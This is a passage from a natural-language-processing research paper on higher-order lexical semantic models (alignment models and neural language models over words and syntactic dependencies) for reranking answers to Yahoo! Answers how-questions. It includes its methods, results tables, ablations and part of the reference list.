source word to des- tination words) as distributed representations for source words, based on the observation that words with similar alignment distributions are likely to have a similar meaning. Formally, we denote the alignment vector representation for the ith word in the vocabulary as w(i), and define the jth en- try in the vector as w(i)j = T(wordj|wordi), where T(.|.) is the translation probability distri- bution from Eq. 3. That is, the jth entry of the vector for word i is the conditional probability of seeing wordj in a question, given that wordi was seen in a corresponding answer. The vector for each word then represents a discrete (conditional) probability distribution. To compare two words, we use the square root of the Jensen-Shannon di- vergence (JSD) between their conditional distri- butions.6 Let m(i,j) be the element-wise aver- age of the vectors w(i) and w(j), that is (w(i) + w(j))/2, and let K(w,v) be the Kullback-Leibler divergence between distributions (represented as vectors) w and v: K(w,v) = |V |∑ i=0 wi ln wi vi (4) where |V | is the vocabulary size (and the dimen- sionality of w). Then the distance between words i and j is J(w(i), w(j)) = √ K(w(i), m(i, j)) + K(w(j), m(i, j)) 2 (5) 6We use the square root of the Jensen-Shannon diver- gence, derived from Kullback-Leibler divergence, since it is a distance metric (in particular it is finite and symmetric). 200 We derive four additional LS features from these alignment vector representations, which par- allel the features derived from the NNLM vec- tor representations (§4.1). The first is the JSD between the composite alignment vectors for the question and the answer candidate, where the composite is constructed by summing the vec- tors for individual question (or answer candidate) words, and dividing by the number of vectors summed. We also generate features from the av- erage, minimum, and maximum pairwise JSD between words in the question and words in the answer candidate. In practice, we have found that the addition of these four features considerably improves the performance of all alignment mod- els investigated for the QA task. 4.3 Modeling Syntactic Structures Surdeanu et al. (2011) demonstrated that align- ment models can readily capitalize on represen- tations other than words, including representa- tions of syntax. Here we expand on their work and explore three syntactic variations of the align- ment and NNLM models. For these models we make use of collapsed syntactic dependencies with processed CC complements (de Marneffe et al., 2006), extracted from the Annotated English Gi- gaword (Napoles et al., 2012). The first model is a straightforward adaptation of the alignment model in §4.2, where the repre- sentations of questions and answers are changed from bags of words to “bags of syntactic depen- dencies” (Surdeanu et al., 2011). That is, the terms to be aligned (q and a in Eq. 1 to 3) become 〈head,label,dependent〉 dependencies, such as 〈eat,dobj,pancakes〉, rather than words. The motivation behind this change is that it allows the model to align simple propositions rather than words, which are a more accurate representation of the information encoded in the question. While tuning on the development set of questions we found that unlabeled dependencies, which ignore the middle term in the above tuples, performed better than labeled dependencies, possibly due to the sparsity of the labeled dependencies. As such, all our dependency alignment models use unla- beled dependencies. The second model adapts the idea of working with bags of syntactic dependencies, instead of bags of words, to NNLMs, and builds an LM over dependencies rather than words. However, be- cause the NNLM embeddings are generated from context, we must find a consistent ordering of de- pendencies that maintains contextual information. Here we order dependencies using a depth-first, left-to-right traversal of the dependency graph originating at the predicate or root node.7 Fig- ure 3 shows an example of such a traversal, which results in the following ordering (using unlabeled dependencies): (6) be time time the time same be country country no be should be business business the business concealing concealing history history its Figure 3: DFS L→R ordering of word pairs starting from the sentential root. The sentence is taken from LTW ENG 20081201.0002 of the English Gigaword. The model uses the default word2vec imple- mentation to compute the term embeddings. To our knowledge, this syntax-driven extension of NNLMs is novel. During tuning we compared the labeled and unlabeled dependency representations against an NNLM model using traditional bigrams (where words are paired based on their linear order, i.e., without any syntactic motivation). Again, we found that unlabeled dependencies outperformed surface bigrams and labeled dependencies. Lastly, we also evaluate the recent NNLM model proposed by Levy and Goldberg (2014a), who modified the word2vec embedding proce- dure to include context derived from dependen- cies, arguing that this embedding model encodes functional similarity better than Mikolov et al.’s unigram surface structure model. It is important to note that while in our syntactic NNLM model the LM terms are (lexicalized unlabeled) syntactic dependency tuples, in Levy and Goldberg’s model the LM terms are still words, but the context is driven by syntax instead of surface structure. 5 Higher-order lexical models The first-order models we have just described make use of the direct evidence seen in training data to create associations between words (or de- pendencies). Unfortunately this training data is often quite sparse, and while it may be possi- ble to exhaustively create training data with broad 7Other ordering schemes were tested during development, but DFS proved to be the most stable across sentences. 201 coverage for artificially narrow domains such as things to eat for breakfast, this quickly becomes intractable for larger domains. To mitigate this sparsity, here we propose a method that identifies associations that were not explicitly seen during training. Returning to our example in §1, had an alignment model learned the associations break- fast – pancakes and pancakes – hashbrowns, the model should be able to make use of the indi- rect association between breakfast – hashbrowns to further “bridge the lexical chasm”, and iden- tify answer candidates containing the word hash- browns to the question Where is a good place to eat breakfast? At first glance, algorithms such as PageR- ank (Page et al., 1999) appear to offer an attractive and intuitive method to determine the association between arbitrary nodes in a weighted graph by modeling a random walk to convergence (from any given starting node). As we show in Section 6, we have found that these methods quickly accumulate semantic drift (McIntosh, 2010), because: (a) they run to convergence, i.e., they traverse paths of ar- bitrary length, and (b) they explore the entire asso- ciation space encoded in the neighborhood graph, both of which introduce considerable noise. For example, by chaining even small numbers of di- rect associations, such as breakfast – pancakes, pancakes – hashbrowns, hashbrowns – potato, and potato – field, a model that does not control for se- mantic drift may be tempted to answer questions about breakfast venues with answers that discuss wheat fields or soccer fields. Thus, keeping these indirect associations short and on-context is criti- cal for QA. Based on the above observations, here we out- line a general method for creating higher-order lexical semantic models that incorporate simple measures to control for semantic drift, and demon- strate how to apply it to both alignment graph rep- resentations and the distributed vector space repre- sentations of a NNLM. Our method relies on two general properties of the first-order LS models: (a) all models include a distributed representation for each term8 that is encoded as a vector (e.g., for NNLMs this is a term’s embedding in vector space, and for alignment models this is a vector of alignment probabilities from a given answer term to all possible question terms), and (b) models de- 8Henceforth we use “term” to indicate either a word or a dependency in a lexical semantics model. fine a pairwise function that assigns a lexical sim- ilarity score between pairs of directly connected terms (e.g., for NNLMs this is the cosine similar- ity of the corresponding term embeddings, and for alignment models this is given directly by T(q|a), from Equation 3). Intuitively, we incorporate indirect evidence in our models by averaging the distributed represen- tation of a term t with the distributed representa- tions of its neighbors, i.e., those terms with high- est lexical similarity to t. To control for seman- tic drift we consider: (a) only the k most similar neighbors to the current term, and (b) short paths in the association graph, e.g., neighbors of neigh- bors but no further. For example, for a second- order model, we construct this new vector repre- sentation for each node in the graph by averaging the vector of the node itself and the vectors of its k closest neighbors (weighted by each pair’s similar- ity), so that the vector representation of breakfast becomes a weighted sum of breakfast, morning, food, cereal, and so forth. By using only the clos- est neighbors, we exclude low associates of break- fast, such as spoon or vacation, which are only marginally related and therefore likely to generate semantic drift. Formally, let w be the vector representation (ei- ther from an NNLM or alignment model) of a given term. We construct a higher-order represen- tation ŵ by linearly interpolating w with its top associates, those vectors with highest value of a pairwise scoring function s: ŵ(i) = ∑ j∈Nk(w(i)) s(w(i),w(j)) w(j) (7) where s is the function that measures the lexi- cal similarity between terms, and depends on the representations used (salign or scos, see below). Nk(w(i)), the neighborhood of the vector w(i), denotes the indices of the k term vectors with highest values of s(w(i), ·), and k is a hyperpa- rameter that controls how many vectors are inter- polated. The resulting vectors are renormalized, as discussed later.9 It is important to note that this process of creating higher-order vectors can be trivially 9Nk(w) includes w, because in all LS models proposed here, each term has maximal similarity with itself. The nor- malization applied after combining all vectors has the effect of modulating the contribution of the vector w in the higher order representation ŵ, based on how similar the other vec- tors in Nk(w) are to w. 202 iterated arbitrarily, constructing a second-order model from a first-order model, then a third-order model from a second, etc. Intuitively, this models paths of increasing length in the association graph over terms. We now describe the concrete implementations of the procedure in the alignment and the NNLM settings. Higher-order Alignment: In the alignment set- ting, where the vector w(i) for term i contains the probabilities that the source (answer) term i is aligned with the destination (question) term j, we use salign(w(i),w(j)) = T(termj|termi) (8) where T is the translation probability from Equa- tion (3). We normalize the ŵ vectors of Equa- tion (7) using the L1 norm, so that each contin- ues to represent a probability distribution. In- tuitively, the second-order alignment distribution ŵ(i) for source term i is a linear combination of term i’s most probable destination terms’ distri- butions, weighted by the destination probabilities from w(i). The higher-order models greatly reduce the sparsity of the first-order alignment graph. In a first-order word alignment model (i.e., using only direct evidence) trained on approximately 70,000 question/answer pairs (see §6.1), source words align with an average of 31 destination words with non-zero probability, out of a 103,797 word vocabulary. The second-order model aligns 1,535 destination words to each source word on average; the third-order model, 8,287; and the fourth-order model, 15,736. In the results section, we observe that this sparsity reduction is only helpful up to a certain point; having too many associates for each word reduces performance on the QA task. Higher-order NNLM: In the NNLM setting, we use the cosine similarity of vectors as interpolation weights and to choose the nearest neighbors: scos(w(i),w(j)) = w(i) ·w(j) ||w(i)|| ||w(j)|| (9) We found that applying the softmax function to each term’s vector of k-highest scos similarities, to ensure all interpolation weights are positive and have a consistent range across terms, improved performance. As such, all higher-order NNLM models use this softmax normalization. The resulting interpolation can be conceptual- ized in several ways. Viewing cosine similarity as a representation of entailment (Beltagy et al., 2013), the higher-order NNLM model reflects multiple-hop inference on top of the correspond- ing association graph, similar to the higher-order alignment model. The interpolation could also be viewed as smoothing term representations in vector space, averaging each term’s vector with its nearest neighbors according to their cosine similarity. Higher-order Hybrid Model: We also imple- ment a hybrid model, which interpolates the align- ment distribution vectors, but using the pairwise cosine similarities from the NNLM setting: ŵA(i) = ∑ j∈Nk(wN(i)) scos(wN(i),wN(j)) wA(j) where wN(i) and wA(i) are respectively the NNLM vector and alignment vector representa- tions for term i, and scos is cosine similarity. In addition, we experimented with the opposite hy- brid model: interpolating the NNLM vectors us- ing alignment associate probabilities as weights, but found that it did not perform as well as using NNLM similarities to interpolate alignment vec- tors. Our conjecture is that the higher order tech- nique can be viewed as a method of reducing spar- sity (either in the vectors or in the context used to create them), and since the NNLM vectors trained on words (as opposed to dependencies) are less sparse, they benefit less from this technique. 6 Experiments 6.1 Data To test the utility of our approach, we experi- mented with the QA scenario introduced in §3 using the subset of Yahoo! Answers Corpus in- troduced by Jansen et al. (2014)10. Yahoo! An- swers11 is an open domain community-generated QA site, with questions and answers that span for- mal and precise to informal and ambiguous lan- guage. This corpus contains 10,000 QA pairs from a corpus of how questions. Each question contains at least four community-generated answers, one of which was voted as the top answer. The number of answers to each question ranged from 4 to over 50, 10http://nlp.sista.arizona.edu/ releases/acl2014 11http://answers.yahoo.com 203 http://nlp.sista.arizona.edu/releases/acl2014 http://nlp.sista.arizona.edu/releases/acl2014 http://answers.yahoo.com with the average 9. 50% of QA pairs were used for training, 25% for development, and 25% for test. The following additional resources were used: NNLM Corpus: We generated vector represen- tations for words using the word2vec model of Mikolov et al. (2013), using the skip-gram architecture with hierarchical sampling. Vec- tors are trained using the entire Gigaword cor- pus of approximately 4G words.12 We used 200- dimensional vectors (Jansen et al., 2014). Alignment Corpus: We use a separate partition of QA pairs to train an alignment model between questions and top answers. This corpus of 67,972 QA pairs does not overlap with the collection of 10,000 pairs used for the training, development, and testing partitions, but was chosen according to the same criteria. The alignment model was trained using GIZA++ over five iterations of IBM Model 1. 6.2 Tuning The following hyperparameters were tuned inde- pendently to maximize P@1 on the development partition of the Yahoo! Answers dataset: Number of Vectors Interpolated: We investi- gated the effects of varying k in Eq. 7, i.e., the number of most-similar neighbor vectors interpo- lated when constructing a higher-order model. We experimented with values of k ranging from 1 to 100 and found that the value does not substantially affect results across the second-order word align- ment models. Since vectors used in the higher- order interpolation are weighted by their similar- ity to a vector w, this is likely due to a swift de- crease in values of the pairwise similarity function, s(w, ·), beyond the vectors closest to w. We chose to use k = 20 because it comes from a stabler maximum, and it is sufficiently small to make con- struction of higher-order models feasible in terms of time and memory usage. Base Representation Type: We compared the effects of using either words or lemmas as the base lexical unit for the LS models, and found that words achieved higher P@1 scores in both the alignment and NNLM models on the develop- ment dataset. As such, all results reported here use words for the syntax-independent models, and tu- ples of words for the syntax-driven models. Content Filtering: We investigated using part- of-speech (POS) tags to filter the content consid- 12LDC catalog number LDC2012T21 ered by the lexical similarity models, by excluding certain non-informative classes of words such as determiners. Using POS tags generated by Stan- ford’s CoreNLP (Manning et al., 2014), we fil- tered content to only include nouns, adjectives, verbs, and adverbs for the word-based models, and tuples where both words have one of these four POS tags for the syntax-based models. We found that this increased P@1 scores for all word- based alignment and NNLM models (including the Levy-Goldberg (L-G) model13), but did not improve performance for models that used depen- dency representations.14 Results reported in the remainder of this paper use this POS filtering for all word-based alignment and NNLM models (in- cluding L-G’s) as well as the dependency align- ment model, but not for our dependency NNLM model.15 6.3 Baselines We compare against five baseline models: Random: selects an answer randomly; CR: uses the ranking provided by our shallow an- swer Candidate Retrieval (CR) component; Jansen et al. (2014): the best-performing lexi- cal semantic model reported in Jansen et al. (2014) (row 6 in their Table 1).16 PRU: PageRank (Page et al., 1999) with uni- form teleportation probabilities, constructed over the word alignment graph. Let A be the row- stochastic transition matrix of this graph, where the ith row of A is the vector w(i) (see §4.2). Fol- lowing the PR algorithm, we add small “teleporta- tion” probabilities from a teleportation matrix T 17 to the alignment matrix, producing a PageRank 13We modified the L-G algorithm to ignore any dependen- cies not matching this filtering criterion when building the context for a word. 14We hypothesize that our filtering criterion for dependen- cies, which requires both head and modifiers to have one of the four POS tags, was too aggressive. We will explore other filtering criteria in future work. 15Although filtered dependencies yielded slightly lower re- sults in our tuning experiments, we use them in the depen- dency alignment experiments because the unfiltered third- order dependency alignment model was too large to fit into memory. 16We do not report the performance of their discourse- based models, because these models use additional resources making them incompatible with the work shown here. 17We construct the teleportation matrix T by setting each row of T to be a uniform probability distribution, i.e., each entry in a row of T is 1/|V |, where |V | is the vocabulary size. 204 matrix P = α∗A + (1 −α) ∗T . Following pre- vious work (Page et al., 1999), we used α = 0.15. Then, we compute the matrix products P2,P3, ..., using rows in these products as vector representa- tions for terms. Thus, the ith row of Pk gives the conditional probabilities of arriving at each term in the graph after k transitions beginning at term i. PRP: Personalized PageRank (Agirre and Soroa, 2009). This method follows the same algorithm as PRU, but uses NNLM similarities of terms to de- fine non-uniform teleportation probabilities (fol- lowing the intuition that teleportation likelihood should be correlated with semantic similarity of terms). In particular, we obtain the ith row of T by computing the pairwise cosine similarities of term i’s NNLM vector with every other term’s vector, and taking the softmax of these similarities to produce a probability distribution, v(i). To ac- count for missing terms (due to the difference in the alignment and NNLM corpora) we smooth all teleportation probabilities by adding a small value, �, to each entry of v(i). The renormalized v(i) then becomes the ith row of T . 6.4 Results Analysis of higher-order models Table 1 shows the performance of first-order and higher-order alignment and NNLM models across representation type. Rows in the table are labeled with the orders of the representations used. W in- dicates a model where the base units are words, while D indicates a model where the base units are dependencies; A denotes an alignment model, while N denotes an NNLM model. Distinct fea- tures are generated for each order representation (§§4.1, 4.2, 5) and used in the SVM model. For example, WN(1-3) uses features constructed from the 1st, 2nd, and 3rd order representations of the word-based NNLM. Combining multiple orders into a single feature space is important, as each or- der captures different information. For example, the top five closest associates for the term dog un- der WN(1) are: puppy, cat, dogs, dachshund, and pooch, whereas the top associates under WN(2) are: mixedbreed, hound, puppy, rottweiler, and groomer. Aggregating features from all orders into a single ranking model guarantees that all this information is jointly modeled. We use the standard implementations for pre- cision at 1 (P@1) and mean reciprocal rank (MRR) (Manning et al., 2008). Several trends are apparent in the table: (i) All first-order lexical models outperform the random and CR baselines, as well as the system of Jansen et al. The latter result is explained by the novel features proposed in §4.1 and §4.2. We detail the contribution of these features in the ab- lation experiment summarized later in Table 4. (ii) More importantly, both P@1 and MRR gener- ally increase as we incorporate higher-order ver- sions of each lexical model. Out of the six LS models investigated, five improve under their cor- responding higher-order configurations. This gain is most pronounced for the dependency align- ment (DA) model, whose P@1 increases from 25.9% for the first-order model to 29.4% for a model that incorporates first, second, and third- order features. In general, the performance in- crease in higher-order models is larger for sparser first-order models, where the higher-order mod- els fill in the knowledge gaps of their correspond- ing first-order variants. This sparsity is gener- ated by multiple causes: (a) alignment models are sparser than NNLMs because they were trained on less data (approximately 67K question-answer pairs vs. the entire Gigaword); (b) models that use syntactic dependencies as the base lexical units are sparser than models that use words. We conjec- ture that this is why we see the biggest improve- ment from higher order for DA (which combines both sources of sparsity), and we do not see an improvement for the word-based NNLM (WN). This hypothesis is supported by the analysis of the corresponding association graphs: in the WA model, counting the number of words compris- ing the top 99% of the probability mass distribu- tion for each word shows sparse representations with 10.1 most-similar words on average; in the WN model, the same statistic shows dense dis- tributed representations with the top 99% of mass distributed across 1.2 million most-similar words per word (or, about 99% of the vocabulary). (iii) The higher-order models perform well up to an order of 3 or 4, but not further. For exam- ple, the performance of the word alignment model (WA) decreases at order 4 (row 7); similarly, the performance of the word NNLM (WN) decreases at order 5 (row 12). This supports our initial ob- servation that long paths in the association graph accumulate noise, which leads to semantic drift. (iv) The Levy-Goldberg NNLM (DNL-G) is the best first-order model, whereas our dependency- 205 P@1 MRR # Model P@1 Impr. MRR Impr. Baselines 1 Random 14.29 26.12 2 CR 19.57 – 43.15 – 3 Jansen et al. (2014) 26.57 – 49.31 – Word Alignment (WA) 4 CR + WA(1) 27.33 +40% 49.20 +14% 5 CR + WA(1-2) 29.01* +48% 50.87* +18% 6 CR + WA(1-3) 30.49* +56% 51.92* +20% 7 CR + WA(1-4) 29.65* +52% 51.38* +19% Word NNLM (WN) 8 CR + WN(1) 30.69 +57% 52.02 +21% 9 CR + WN(1-2) 29.57 +51% 51.29 +19% 10 CR + WN(1-3) 30.21 +54% 51.75 +20% 11 CR + WN(1-4) 30.41 +55% 51.91 +20% 12 CR + WN(1-5) 30.05 +54% 51.87 +20% Dependency Alignment (DA) 13 CR + DA(1) 25.89 +32% 48.24 +12% 14 CR + DA(1-2) 28.81* +47% 50.50* +17% 15 CR + DA(1-3) 29.41* +50% 51.14* +19% Our Dependency NNLM (DNO) 16 CR + DNO(1) 30.85 +58% 51.93 +20% 17 CR + DNO(1-2) 31.69* +62% 52.35* +21% 18 CR + DNO(1-3) 31.89* +63% 52.43* +22% Levy-Goldberg Dependency NNLM (DNL-G) 19 CR + DNL-G(1) 31.25 +60% 52.60 +22% 20 CR + DNL-G(1-2) 31.57 +61% 52.76 +22% 21 CR + DNL-G(1-3) 31.69 +62% 52.73 +22% Hybrid Model: Word Alignment with NNLM Similarity (WAN) 22 CR + WAN(1-2) 29.37 +50% 51.05 +18% 23 CR + WAN(1-3) 30.45* +56% 51.84* +20% PageRank Model: Uniform Teleportation (PRU) 24 CR + PRU(1) 27.29 +39% 49.21 +14% 25 CR + PRU(1-2) 30.33* +55% 51.74* +20% 26 CR + PRU(1-3) 30.17* +54% 51.87* +20% PageRank Model: Personalized Teleportation (PRP) 27 CR + PRP(1) 27.09 +38% 49.10 +14% 28 CR + PRP(1-2) 31.01* +58% 52.25* +21% 29 CR + PRP(1-3) 29.89* +53% 51.70* +20% Table 1: Overall results on the Yahoo! Answers dataset using first-order representations (1) and first-order in combination with higher-order representations (1-n). Bold font indicates the best score in a given column for each model group. An asterisk indicates that a score is significantly better (p < 0.05) than the first-order version of that model. All significance tests were implemented using one-tailed non-parametric bootstrap resampling using 10,000 iterations. model creation time matrix size WA (1) – 75 MB WA (2) 33 seconds 1.8 GB WA (3) 4.5 minutes 9.7 GB WA (4) 8.6 minutes 19 GB PR (1) – 41 GB PR (2) 45.6 hours 41 GB PR (3) 45.6 hours 41 GB Table 2: Runtime and memory requirements for creation of matrices, for the original PageRank and our cautious random walk algorithms. Creation of both higher-order WA and PR models is trivially parallelizable, and we report runtimes on a 2.7 GHz processor with parallel execution on 10 cores. based NNLM (DNO) is the best higher-order model. This is an encouraging result for DNO, considering its simplicity. In general, NNLMs perform better than alignment models for answer reranking, which is not surprising considering the difference in size of the training datasets. To our knowledge, this is the first time this type of analy- sis has been performed for QA. (v) Both PRU(1-2) and PRP(1-2) perform better than their first-order variants and better than our 206 P@1 MRR # Model/Features P@1 Impr. MRR Impr. Baselines 1 Random 14.29 26.12 2 CR 19.57 – 43.15 – 3 Jansen et al. (2014) 26.57 – 49.31 – Words 4 CR + WA(1) + WN(1) 30.85 +58% 52.24 5 CR + WA(1-2) + WN(1-2) 31.85* +63% 52.86* +23% 6 CR + WA(1-3) + WN(1-3) 32.09* +64% 52.97* +23% 7 CR + WA(1-4) + WN(1-4) 31.69 +62% 52.75 +22% Dependencies 8 CR + DA(1) + DNO(1) + DNL-G(1) 31.49 +61% 52.93 +23% 9 CR + DA(1-2) + DNO(1-2) + DNL-G(1-2) 32.85* +68% 53.73* +25% 10 CR + DA(1-3) + DNO(1-3) + DNL-G(1-3) 32.77* +67% 53.71* +24% Words and Dependencies 11 CR + WA(1) + WN(1) + DA(1) + DNO(1) + DNL-G(1) 31.85 +63% 53.03 +23% 12 CR + WA(1-2) + WN(1-2) + DA(1-2) + DNO(1-2) + DNL-G(1-2) 32.89† +68% 53.69† +24% 13 CR + WA(1-3) + WN(1-3) + DA(1-3) + DNO(1-3) + DNL-G(1-3) 33.01† +69% 53.96† +25% Table 3: Performance on the Yahoo! Answers dataset for word, dependency, and models that combine the word and de- pendency representations. Bold font indicates the best score in a given column for each model group. An asterisk indicates that a score is significantly better (p < 0.05) than the first-order version of that model group (1), and † indicates that a score approaches significance (p < 0.10). P@1 MRR Model P@1 Delta MRR Delta CR + WA(1) all features 27.33 – 49.20 – − P(Q|A) 25.69 -6% 48.35 -2% − max JSD 27.33 0% 49.10 0% − min JSD 23.57 -14% 46.64 -5% − composite JSD 27.17 -1% 49.02 0% − average JSD 25.41 -7% 47.70 -3% CR + WN(1) all features 30.69 – 52.02 – − max cosine sim. 29.65 -3% 51.49 -1% − min cosine sim. 29.69 -3% 51.43 -1% − composite cosine sim. 27.01 -12% 49.13 -6% − average cosine sim. 26.49 -14% 49.04 -6% Table 4: Ablation experiments for first-order word models. Each row removes a single feature from the corresponding complete model (“all features”). word-based second-order models (WA and WN). As expected, the personalized PR algorithm per- forms better than PRU. However, their perfor- mance drops for the third-order models (rows 26 and 29), whereas our models continue to improve in their third-order configuration. All our third- order models perform better than all third-order PR models. This is caused by our “cautious” traversal strategy that considers only the closest neighbors during random walks, which controls for semantic drift better than the PR methods. Fur- thermore, the resources required for PR are con- siderably larger than the ones needed to imple- ment our methods. Table 2 summarizes the re- quirements of the PR algorithm compared to our closest method (WA). As the table shows, PR has a runtime that is two orders of magnitude larger than WA’s, and requires four times as much mem- ory to store the generated higher-order matrices. Combining NNLMs and alignment models We explore combinations of NNLMs and align- ment models in Table 3, which lists results when higher-order NNLMs and alignment models are combined for a given representation type. Each line in the table corresponds to a single an- swer reranking model, which incorporates features from multiple LS models. These experiments re- inforce our previous observations: higher-order models perform better than their first-order vari- ants regardless of representation type, but perfor- mance increases only for relatively low orders, e.g., 3 orders for words and words combined with dependencies, or 2 orders for dependencies. Importantly, the table shows that the combina- tion of NNLMs and alignment models across rep- resentation types is beneficial. For example, the best first-order combined model (row 11 in Ta- ble 3) performs similarly to the best higher-order individual LS model (row 18 in Table 1). The best combined higher-order model (row 13 in Ta- ble 3) has a P@1 score of 33.01, approximately 1.2% higher than the best individual LS model (row 18 in Table 1). To our knowledge, this is the 207 highest performance reported on this Yahoo! An- swers corpus, surpassing the best model of Jansen et. al (2014), which incorporates both shallow and deep discourse information, and achieves 32.9 P@1. Feature ablation experiments Although the main focus of this work is on higher- order LS models, Table 1 shows that even our first-order models perform better than the previous state of the art. This is caused by the novel features proposed over alignment models and NNLMs. To understand the contribution of each of these fea- tures, we performed an ablation experiment, sum- marized in Table 4, for two models: one alignment model (WA), and one NNLM (WN). This analysis indicates that many of the features proposed are important. For example, two of the novel JSD fea- tures for WA have a higher contribution to over- all QA performance than the alignment probability (P(Q|A)) proposed in previous work (Surdeanu et al., 2011). For WN, the two new features pro- posed here (maximum and minimum cosine sim- ilarity between embedding vectors) also have a positive contribution to overall performance, but less than the other two features proposed in previ- ous work (Yih et al., 2013; Jansen et al., 2014). 6.5 Discussion One important observation yielded by the previ- ous empirical analysis is that higher-order models perform well for sparse first-order variants (e.g., DA), but not for first-order models that rely on already dense association graphs (e.g., WN). We suspect that in densely populated graphs, model- ing context becomes critical for successful higher- order models. Returning to our example from §1, a densely populated graph may already have the associations breakfast – pancakes and pancakes – hashbrowns that allow it to identify restaurants with favorable breakfast foods. Exploring higher- order associations in this situation is only ben- eficial if context is carefully maintained, other- wise an answer reranking system may erroneously select answer candidates with different contexts due to accumulated semantic drift (e.g., answers that discuss films, using associations from texts reviewing Breakfast at Tiffany’s). Incorporating word-sense disambiguation or topic modeling into alignment or NNLM models may begin to address these contextual issues by preferentially associat- ing terms within a given topic (such as restau- rants or films), ultimately reducing semantic drift, and extending these higher-order methods beyond a few hops in the graph. Our analysis suggests that the extra sparsity that contextually-dependent representations introduce may make those models even more amenable to the higher-order methods discussed here. More generally, we believe that graph-based in- ference provides a robust but approximate middle- ground to inference for QA. Where inference us- ing first-order logic offers provably-correct an- swers but is relatively brittle (see Ch. 1 in Mac- Cartney (2009)), LS methods offer robustness, but have lacked explanatory power and the ability to connect knowledge into short inference chains. Here we have demonstrated that higher-order methods capitalize on indirect evidence gathered by connecting multiple direct associations, and in doing so significantly increase performance over LS approaches that use direct evidence alone. By incorporating contextual information and making use of the short inference chains generated by traversing these graphical models, we hypothe- size that graph-based systems will soon be able to construct simple justifications for their answer se- lection (e.g., pancakes are a breakfast food, and hashbrowns go well with pancakes). We hope it will soon be possible to fill this gap in inference methods for QA with higher-order LS models for robust but approximate inference. 7 Conclusions We introduce a higher-order formalism that al- lows lexical semantic models to capitalize on both direct and indirect evidence. We demon- strate that many lexical semantic models, includ- ing monolingual alignment and neural network language models, working over surface or syntac- tic representations, can be trivially adapted to this higher-order formalism. Using a corpus of thou- sands of non-factoid how questions, we experi- mentally demonstrate that higher-order methods perform better than their first-order variants for most lexical semantic models investigated, with statistically-significant relative gains of up to 13% over the corresponding first order models. Acknowledgements We thank the Allen Institute for Artificial Intelli- gence for funding this work. We would also like to thank the three anonymous reviewers for their helpful comments and suggestions. 208 References Eneko Agirre and Aitor Soroa. 2009. Personalizing PageRank for word sense disambiguation. In Pro- ceedings of the 12th Conference of the European Chapter of the Association for Computational Lin- guistics. Marco Baroni, Georgiana Dinu, and Germán Kruszewski. 2014. Don’t count, predict! A systematic comparison of context-counting vs. context-predicting semantic vectors. In Proceedings of the 52nd Annual Meeting of the Association for Computational Linguistics. Islam Beltagy, Cuong Chau, Gemma Boleda, Dan Gar- rette, Katrin Erk, and Raymond Mooney. 2013. Montague meets Markov: Deep semantics with probabilistic logical form. In Proceedings of the Second Joint Conference on Lexical and Computa- tional Semantics. Adam Berger, Rich Caruana, David Cohn, Dayne Frey- tag, and Vibhu Mittal. 2000. Bridging the lexical chasm: Statistical approaches to answer finding. In Proceedings of the 23rd Annual International ACM SIGIR Conference on Research & Development on Information Retrieval. Gaurav Bhalotia, Arvind Hulgeri, Charuta Nakhe, Soumen Chakrabarti, and Shashank Sudarshan. 2002. Keyword searching and browsing in databases using BANKS. In Proceedings of 18th International Conference on Data Engineering (ICDE). Peter F. Brown, Stephen A. Della Pietra, Vincent J. Della Pietra, and Robert L. Mercer. 1993. The mathematics of statistical machine translation: Parameter estimation. Computational Linguistics, 19(2):263–311. Soumen Chakrabarti and Alekh Agarwal. 2006. Learning parameters in entity relationship graphs from ranking preferences. In Proceedings of 10th European Conference on Principle and Practice of Knowledge Discovery in Databases (PKDD). Soumen Chakrabarti. 2007. Dynamic personalized PageRank in entity-relation graphs. In Proceedings of the 16th International World Wide Web Confer- ence (WWW). Marie-Catherine de Marneffe, Bill MacCartney, and Christopher D. Manning. 2006. Generating typed dependency parses from phrase structure parses. In Proceedings of the International Conference on Language Resources and Evaluation (LREC). Abdessamad Echihabi and Daniel Marcu. 2003. A noisy-channel approach to question answering. In Proceedings of the 41st Annual Meeting of the Asso- ciation for Computational Linguistics (ACL). Oren Etzioni. 2011. Search needs a shake-up. Nature, 476(7358):25–26. Peter Jansen, Mihai Surdeanu, and Peter Clark. 2014. Discourse complements lexical semantics for non- factoid answer reranking. In Proceedings of the 52nd Annual Meeting of the Association for Com- putational Linguistics (ACL). Ni Lao and William W. Cohen. 2010. Relational re- trieval using a combination of path-constrained ran- dom walks. Machine Learning, 81(1):53–67. Ni Lao, Tom Mitchell, and William W. Cohen. 2011. Random walk inference and learning in a large scale knowledge base. In Proceedings of the Conference on Empirical Methods in Natural Language Pro- cessing (EMNLP). Heeyoung Lee, Marta Recasens, Angel Chang, Mi- hai Surdeanu, and Dan Jurafsky. 2012. Joint en- tity and event coreference resolution across docu- ments. In Proceedings of the Joint Conference on Empirical Methods in Natural Language Process- ing and Computational Natural Language Learning (EMNLP-CoNLL). Omer Levy and Yoav Goldberg. 2014a. Dependency- based word embeddings. In Proceedings of the 52nd Annual Meeting of the Association for Computa- tional Linguistics (ACL). Omer Levy and Yoav Goldberg. 2014b. Linguistic reg- ularities in sparse and explicit word representations. In Proceedings of the Conference on Computational Natural Language Learning (CoNLL). Dekang Lin. 1998. Automatic retrieval and clustering of similar words. In Proceedings of the 36th Annual Meeting of the Association for Computational Lin- guistics and the 17th International Conference on Computational Linguistics (COLING-ACL-1998). Bill MacCartney. 2009. Natural Language Inference. Ph.D. thesis, Stanford University. Christopher D. Manning, Prabhakar Raghavan, and Hinrich Schütze. 2008. Introduction to Information Retrieval. Cambridge University Press. Christopher D. Manning, Mihai Surdeanu, John Bauer, Jenny Finkel, Steven J. Bethard, and David Mc- Closky. 2014. The Stanford CoreNLP natural lan- guage processing toolkit. In Proceedings of the 52nd Annual Meeting of the Association for Com- putational Linguistics (ACL). Tara McIntosh. 2010. Reducing Semantic Drift in Biomedical Lexicon Bootstrapping. Ph.D. thesis, University of Sydney. Tomas Mikolov, Kai Chen, Greg Corrado, and Jeffrey Dean. 2013. Efficient estimation of word repre- sentations in vector space. In Proceedings of the International Conference on Learning Representa- tions (ICLR). Einat Minkov, William W. Cohen, and Andrew Y. Ng. 2006. Contextual search and name disambiguation in email using graphs. In Proceedings of SIGIR. 209 Vanessa Murdock and W. Bruce Croft. 2005. A trans- lation model for sentence retrieval. In Proceedings of the Conference on Human Language Technology and Empirical Methods in Natural Language Pro- cessing, pages 684–691. Courtney Napoles, Matthew Gormley, and Benjamin Van Durme. 2012. Annotated Gigaword. In Pro- ceedings of the Joint Workshop on Automatic Knowl- edge Base Construction and Web-scale Knowledge Extraction, pages 95–100. Association for Compu- tational Linguistics. Franz Josef Och and Hermann 